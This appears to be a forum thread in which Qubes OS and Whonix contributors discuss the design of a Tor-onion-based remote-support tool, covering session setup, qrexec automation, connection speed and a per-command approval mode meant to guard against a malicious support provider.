The most important thing missing right now would be a shared and contained terminal to mitigate graphical UX latency over Tor. Some thoughts were exchanged, but the project scope was already defined to change direction.
@adrelanos@marmarek : I lost/forgot the conclusions that were said on such shared terminal session sharing, but last time I tested the implementation above, screen delays, and waiting time for the background magic to establish the initial connection were kinda dissuasive.
@alzer89 : Comments on the current implementation?
Honestly, the less the user has to do to get remote support, the better. The whole premise of requiring remote support is that the end user, for whatever reason, cannot (or does not wish to) maintain their own system. For example, journalists and political activists (even government spies) might encounter issues in the field, and need to phone home anonymously for tech support.
I can also see this as a viable solution to remote access of machines for testing. Maybe even a torified dropbear instance in the initrd to allow remote entry of the LUKS password (with a lot more thought given to it than I have just now ).
Things like copying and pasting keys between VMs can already be done by the dom0 script.
Graphics (VNC) over Tor would be a bit of a stretch. I mean, it would be awesome to see, but you’re at the mercy of the Tor node you’re dealing with.
It’s already pretty capable as is, but I will post again if I think of anything else.
INFO: Install authenticated Tor onion v3 service private key with the following command in sys-whonix.
sudo sourcefile=~/QubesIncoming/disp4522/1.auth_private anon-server-to-client-install
Do as instructed in sys-whonix VM. Do not copy the command from here. Copy the command from qubes-remote-support-provider VM script output, then paste and run in sys-whonix VM. Then press enter to continue in qubes-remote-support-provider VM.
Maybe this part would be good to automate/simplify using Qubes qrexec and a dom0 GUI prompt?
What do you mean by that?
What I find cumbersome is needing to re-setup a remote support session after every reboot. I’d like to have an optional persistent option. Think of systems under personal control. Setting it up once and then always available.
There is nothing Whonix version specific in the code.
Opened a pull request just now to remove some Qubes R4.0 legacy code which might cause should an erroneous impression:
(This would not break Qubes R4.0. Qubes R4.0 version is not supposed to get this change.)
Isn’t this already implemented? What else would the scripts use?
Some sort of secret needs to be securely transmitted out-of-band. The secret words are already abstracting away from the user:
None of that required by the user. I don’t see how it could humanly possibly be simplified further even in concept. Happy to be proven wrong.
I guess by “contained terminal” you mean “SSH audit”, server functionality that a jump server / jump host which transparently logs all actions taken by the remote-support-provider?
The SSH jump server that does the logging would need to be hosted somewhere. Perhaps in a (dedicated or existing) Qubes VM. The logging would be a nice feature for transparency, even just keeping a log of all commands executed.
But security as in preventing compromise not even noticed by the remote-support-receiver for that is very hard to accomplish… See below…
Functionality wise it might be nice.
But this wouldn’t be secure. The remote-support-provider, could send a long command which compromises the system and cleans up any visual evidence of itself. The remote-support-receiver might just see a flash in the shared terminal or more likely nothing at all.
Using a console / shell directly for this would be an insecure, loosing game of deny list, “whack-a-mole”. Console / shell based would probably be totally insecure as these are complex with weird shell control characters, invisible colors and potential unicode abuse.
An approach that can at least potentially be won, would be an allow list based approach. The remote-support-receiver would have to manually accept or reject each and every command before it is executed. This would probably require a custom program. I am not aware of such a software. A limited SSH permission for the remote-support-provider to connect to the custom program that permits to suggest commands to be executed on the remote-support-receiver’s computer that can then be accepted or denied.
Then the remote-support-receiver would have at least a chance to look at commands to be executed before these are executed. Very advanced users then could avoid getting compromised if the remote-support-provider acts maliciously. But most users watching a sysadmin typing tons of command into a shell is probably “lost at hello” anyhow. The amount of users actually capable to determine “oh, this command looks legit, accept” and “oh, that command is malicious, reject” might be tiny. Users with such skills, might not accept remote support from untrusted strangers anyhow. Perhaps a corporate 4+ eyes security concept thing.
Two different remote-support-receiver-modes:
full (as of now)
permissioned (accept or deny each command)
(For lack of better terms.)
If connection privacy isn’t important at least in theory I have an idea how to speed it up. By reducing the number of Tor relays involved from 6 to perhaps 2. Perhaps remote-support-receiver and remote-support-provider both using Tor in “single hop mode”.
Or replacing the current mechanism of using Tor onions and Tor as a client for connection setup and security by some other mechanism. But what mechanism?
To have similar good usability, it needs to support NAT to NAT. Either remote-support-receiver or remote-support-provider would need an open server port reachable from the open internet. That is cumbersome to set up. Too complicated for remote-support-receiver. And even to cumbersome for remote-support-provider.
For a similar mechanism, somehow a NAT to NAT using NAT hole punching. I failed to establish a NAT to NAT connection, both:
That’s exactly what I meant when I said dom0 could do more of the heavy lifting.
Imagine telling someone to do these steps who describes computer issues as “my computer’s ‘not working’. I don’t know, it’s just ‘broken’. I don’t know what’s wrong with it, how would I know? Isn’t that what you’re here for? Fix it now!”
A don’t think a lot of businesses would be willing to invest in training their staff to do these steps, so automating this would definitely be a plus.
It can be achieved through a series of qvm-run —pass-io and qvm-copy commands. I’ve been working on it, and will commit them when they actually work….
Sometimes it would be helpful to be able to get a shell into a single VM as well (through some secure be way, yet to be determined). Running qvm-run commands in dom0 and not seeing the output makes troubleshooting difficult at the best of times. Would be cool to have if it didn’t “add to the attack surface” (which it probably would….).
I agree. I definitely think that’s something that corporate users would definitely find appealing and useful.
My two cents:
This could be coupled with a dropbear instance in the dom0 initramfs, for example, to allow remote entering of LUKS password, remote wipe, and many other functions that the corporate IT world seems to love.
I don’t know how I feel about having persistent open ports on a machine that isn’t a server (but I’m sure there would be ways to go about this).
All of these options would be excellent to have in the GUI somewhere (Qubes Global Settings, or Qubes Remote Support, maybe?).
I mean the script would look for the latest version of Whonix template installed and use that, or check which whonix template sys-whonix is currently using, and use that.
I know it’s a simple thing to write in bash, but I just haven’t gotten it perfectly right yet….
I agree that it’s most likely best to do that out-of-band, but there would definitely be other ways, like utilising corporate VPNs and other protocols like I2P or Gopher (just examples, haven’t researched fully yet….).
I agree with this.
I swear, the number of times I’ve had this conversation: Person: Are you hacking? Oh please don’t hack me! Me: Um……no….I’m editing my settings in a terminal…. Person: Yeah you are! Only hackers use terminals! I’m going to report you to the police! Me:
Maybe make this configurable as a script argument and an option in the GUI?
That is only asked for the remote-support-provider.
Not for the remote-support-receiver.
The difficult part is done by the one providing support and it’s just a simple copy/paste.
The one receiving support doesn’t need to do that.
Yeah, but even simplification the task for the remote-support-provider would be nice.
Would this require any string parsing in dom0? I am not sure that would be acceptable but Qubes reviewers have the final say on this. Therefore I recommend to open a pull request, work in progress (WIP) early (pointing out WIP) to get some early feedback if the approach is acceptable.
Otherwise a qrexec call from the qubes-remote-support-provider VM to sys-whonix (or “$sys_whonix”) might be better. That qrexec call could automate the Install authenticated Tor onion v3 service private key part. Default would be qrexec ask, I guess and optional if previously set-up in dom0 even qrexec allow.
Options for the connection:
direct with one machine requiring an open port (mostly remote-support-provider and then reverse SSH)
NAT hole punching somehow
authenticated Tor onion services “default”
authenticated Tor onion services 1 hop
Certainly cool stuff but I don’t see how that’s technically possible. dom0 is non-networked by default and at initramfs boot stage, no sys-net / networking is available either. Would require a complete pre-(real)-boot mini operating system just for that purpose? WiFi passwords setup or LAN-only support? Seems like a huge additional project.
Is this about package installation? If yes, as far as I know, Qubes prefers automating package pre-installation using Qubes salt.
Even I2P might not be as fast as people are used to from the closed source remote support tools available for the Microsoft Windows platform. NAT hole punching and direct connections seems best to square this circle so to speak, covering all the requirements. Wormhole could still be used to help simplify setting up the VNC connections (so nobody has to bother with IPs, ports, etc.).
I know, and that’s excellent, but there’s no harm in making life easier for the support provider too
The thing about any automation is that it would have to take place within dom0, because VMs can’t communicate with each other unless relaying through dom0 (I’m fully aware that you know this. Just trying to fill in the gaps for anyone else who’s reading this ).
At the moment, the provider does everything within a Whonix workstation dispVM, which is fine, but it means there’s no way for the connection setup process to be automated (within the current method, at least…).
I propose a qubes-remote-support-provider-setup script (name TBA, by the way) that will be placed in dom0, be able to be initiated by the GTK GUI app (with a text box for the wormhole words), and will initiate all the necessary steps in a disposable whonix VM, finishing with the SSH session into the target machine.
Working on it now. Will commit when it’s usable.
I don’t think so. It would either require the strings being accessible from/in dom0, or would end up syncing between VMs via qrexec. There would be ways to do this that would tick all the boxes
Would it be acceptable to have a persistent onion connection open? (With the end user having the option to terminate it at any time, of course…)
Am I right in saying that this opening would be useless without the SSH certificate, or a vulnerability in Tor/SSH?
In any case, this would fully rely on sys-whonix being open…
Yeah, it would probably require a bit of work, but it would definitely be a useful thing to have if you were distributing Qubes OS in the corporate world.
”I forgot my LUKS password, and I need to get my work done. What do you mean you can’t help me? You’re the IT department. What are you getting paid for?!?!”
No no. I’m just planning ahead for Whonix 17, 18, 19, etc.
At the moment, those bash scripts look for a specific Whonix version (that’s what actually got me to start tinkering with them in the first place ).
I’ve committed a few tweaks to the repo to list all VMs with Whonix in the name, and to use the VM with the highest number. They still need a bit of tweaking, but they “work” at the moment.
I’ve also added a dom0 script for the provider, which “works” at the moment. Still a work in progress, though….
A Qubes Template uses qrexec to talk to Qubes UpdatesProxy in a different VM.
anon-whonix sends sdwdate status information to sdwdate-gui running on sys-whonix. This is by default allowed. For other use cases, one could say default ask, which might be appropriate here.
Therefore I don’t think dom0 modifications are required except dom0 qrexec policy files. The script running in remote-support-provider could send a qrexec command to another VM. The recipient VM is even configurable in dom0 qrexec policy (probably default sys-whonix here).
That would be good. Would making re-establishing connections easier. But wouldn’t solve any slow connection issues.
This is what I meant by “relay through dom0”. I didn’t word it properly, my bad.
The challehge is giving a disposable Whonix vm the ability to interact with sys-whonix, and how that impacts on the user experience.
Yes, adding an “ask” option would technically “work”. I’m just trying to see if there is a way to remove that user interaction for that step, to streamline it for the support provider (there is a chance that the person providing support is “just an IT employee” and could get frustrated at having to click “allow” every time, just like Windows Defender Windows Vista!).
At the same time, having an “allow” policy from a disposable Whonix VM to sys-whonix would probably allow for all sorts of shenanigans when browsing Tor.
Either way, you’re sacrificing something, but they both “work”
Useless for remote exploitation. Qubes users are just like 14th century seafarets, they lever leave a good port open and exposed to the elements. It’ll spoil